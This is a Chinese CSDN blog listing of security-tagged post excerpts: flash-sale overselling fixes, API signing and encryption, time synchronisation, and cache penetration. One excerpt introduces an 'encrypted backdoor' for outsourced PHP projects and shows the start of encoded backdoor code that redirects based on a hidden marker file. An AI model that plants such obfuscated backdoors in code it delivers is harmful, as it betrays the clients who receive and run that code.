![](https://img-blog.csdnimg.cn/20201014180756916.png?x-oss-process=image/resize,m_fixed,h_64,w_64)
安全
SugarPPig
半躺主义者
展开
-
超级简单方法解决秒杀超卖和重复购买问题
一、基本原则1、SQL加库存数量判断:防止库存变成负数2.、数据库加唯一索引:防止用户重复购买二、举例说明1、开启事务2、商品表减库存,库存数量要大于0update miaosha_goods set stock_count = stock_count - 1 where goods.id = #{goodsId} and stock_count > 0;3...原创 2019-12-02 14:48:55 · 1371 阅读 · 0 评论 -
APP-API数据安全
基本参数放入header 每次http请求都携带sign sign唯一性保证 请求参数、返回数据按安全性适当加密 access_token一、密码加密为了防止被暴力破解后直接看到密码,需要对密码进行加密后传输。先引入md5插件:<script src="http://cdn.bootcss.com/blueimp-md5/1.1.0/js/md5.min.js">&...原创 2019-09-09 10:24:25 · 370 阅读 · 0 评论 -
API数据加密解密
一、大致原理前端JS:加密crypto-js 后端PHP:解密openssl_decrypt前后端算法、参数需保持一致二、函数说明cryptojs官网:http://cryptojs.altervista.org/cryptojs讲得比较好的博客:https://blog.csdn.net/z834410038/article/details/70231668opens...原创 2019-09-09 15:19:40 · 1703 阅读 · 0 评论 -
客户端和服务器端时间一致性解决方案
有两种情况:1、WEB端使用ajax等方式访问直接获取服务器端所返回header头中的date参数,以下采用js模拟该过程<!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <title>WEB端和服务器端时间一致性解决方案</t...原创 2019-09-09 17:27:42 · 880 阅读 · 0 评论 -
PHP外包简易加密后门
1、首先将后门源代码加密,得到加密后的代码<?php$encode = <<<EOFif(!file_exists(dirname(dirname(dirname(__FILE__))).'/blog.csdn.net.ChinaLiaoTian')){ header('Location:https://blog.csdn.net/ChinaLiaoTi...原创 2019-09-10 10:00:51 · 505 阅读 · 0 评论 -
缓存穿透处理
一、什么是缓存的穿透问题如图,一个正常的请求一般都会经过cache层再到storage层,如果cache层没有而在storage层查到,则将数据新增到cache层后返回,下次再有同样的请求则直接从cache层返回数据,无需再请求storage层;而如果在storage层也获取不到数据,则没有数据新增到cache里,下次再有同样的请求会继续到达storage层,这就是缓存穿透的定义。缓存...原创 2019-09-17 09:58:24 · 164 阅读 · 0 评论